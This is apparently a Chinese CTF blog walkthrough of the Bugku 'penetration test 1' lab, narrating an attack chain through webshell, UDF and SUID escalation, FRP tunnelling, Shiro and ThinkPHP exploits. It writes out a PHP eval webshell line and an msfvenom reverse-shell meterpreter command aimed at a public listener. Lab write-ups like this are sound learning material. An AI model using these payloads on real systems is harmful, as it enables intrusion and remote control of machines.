bugku-渗透测试1

前言

⏰时间:2023.7.9
⚠️文中涉及操作均在靶机模拟环境中完成,切勿未经授权用于真实环境。
🙏本人水平有限,如有错误望指正,感谢您的查阅!
🎉欢迎关注🔍点赞👍收藏⭐️留言📝

看源码

拿到地址进入页面
在这里插入图片描述先看源码,拿到第一个flag
在这里插入图片描述

扫目录

在这里插入图片描述

弱密码

访问/admin.html
在这里插入图片描述试试弱密码在这里插入图片描述成功进入后台
网站配置下的基本设置中发现flag在这里插入图片描述

写入webshell

在php教程中的运行预览页可运行代码
在这里插入图片描述点击运行发现生成php文件
在这里插入图片描述将其修改为一句话
在这里插入图片描述但是怎么都访问不到这个php文件,可能是生成一下后自动就删除了
那就用这个file_put_contents(‘haha.php’,‘<?php @eval($_REQUEST[cmd]);?>’);在这里插入图片描述
home/ctf/flag,看到提示database
在这里插入图片描述

连接数据库

找到数据库配置文件
在这里插入图片描述
直接在蚁剑连接数据库,这里要填127.0.0.1,不能写localhost在这里插入图片描述
拿到flag,提示nc 还有root
在这里插入图片描述

UDF提权

可能root目录下还有flag,需要提权,mysql是64位
在这里插入图片描述使用sqlmap里的cloak.py编译lib_mysqludf_sys.so_
在这里插入图片描述将编译好的文件通过蚁剑上传
在这里插入图片描述

数据库中执行
在这里插入图片描述查看plugin位置
在这里插入图片描述

然后将1.txt中的内容添加到select 0x后面 ,在跟上into dumpfile ‘/usr/lib/x86_64-linux-gnu/mariadb18/plugin/mysys.so’;
在这里插入图片描述在这里插入图片描述在这里插入图片描述
root权限
在这里插入图片描述root下有flag
在这里插入图片描述
提示8080
在这里插入图片描述
查看hosts以及/proc/net/arp,发现内网存在192.168.0.1 和192.168.0.2,这两个地址一般是网关之类的,可能需要访问127.0.0.1的8080,frp内网穿透一下
在这里插入图片描述

FRP内网穿透

将frpc和frpc.ini通过蚁剑上传
在这里插入图片描述
在这里插入图片描述

Proxifier代理

使用proxifier代理,ip是你的公网ip,port是frpc.ini中的remote_port
在这里插入图片描述

Shiro反序列化

本地访问 192.168.0.1:8080发现可以访问到一个登录界面
在这里插入图片描述
输入root root一直在转圈,看了下抓到的包,发现返回包中有rememberme=deleteme
可能存在shiro反序列化
在这里插入图片描述利用工具测试
在这里插入图片描述进入命令执行,先看下对方是什么shell
在这里插入图片描述
测下可以通外网
在这里插入图片描述执行反弹shell
在这里插入图片描述找flag,home下和root下各一个
在这里插入图片描述
grep “flag” *全盘搜一下flag字段,发现/BOOT-INF/classes/templates/robots.html里面也有
在这里插入图片描述在这里插入图片描述
或者http://192.168.0.1:8080/robots.txt也是这个flag
在这里插入图片描述

SUID提权

root下需要提权,这看下最简单的提权方式suid,发现可以
在这里插入图片描述
提示内网,看下 /etc/hosts和/proc/net/arp
在这里插入图片描述用kscan扫一下,发现192.168.0.4的80存在网站,3306mysql
在这里插入图片描述

thinkphp漏洞利用

在这里插入图片描述扫目录发现存在/admin,是个登录页面,不存在弱密码
访问admin.php报错,可以看到存在thinkphp框架,版本是5.0.20
在这里插入图片描述在这里插入图片描述
利用工具探测一波,发现数据库信息泄露
在这里插入图片描述连接拿到flag
在这里插入图片描述在这里插入图片描述getshell
在这里插入图片描述在这里插入图片描述

找漏洞

查看版本
在这里插入图片描述
sudo 版本1.8.31,搜了一下确实存在漏洞
在这里插入图片描述

反弹shell到msf

kali中搜到了相关模块,把shell弹到kali的msf中
在这里插入图片描述

msf映射到公网

kali中配置frpc.ini
[common]
tls_enable = true
server_addr = x.x.x.x
server_port = 7000
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 4444
remote_port = 5555

启动后msfvenom生成反弹elf文件
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=公网ip lport=5555 -f elf > hh.elf
msf 设置监听
蚁剑传到目标chmod 777 后执行
msf收到反弹shell
在这里插入图片描述bg放到后台
使用刚才找到的模块,set session 1 ,但是没成功
在这里插入图片描述

提权exp

于是又从网上下了个exp
在这里插入图片描述
传到目标
在这里插入图片描述
蚁剑无法提权,还是得在反弹的shell中执行
在这里插入图片描述在这里插入图片描述

结束

这个靶机总体难度适中,涉及的点比较多,很经典,还是很值得像我这样的菜鸟去打的。最后感谢您的查阅,如有错误望指出。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

PenTest3r_Zerlk

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值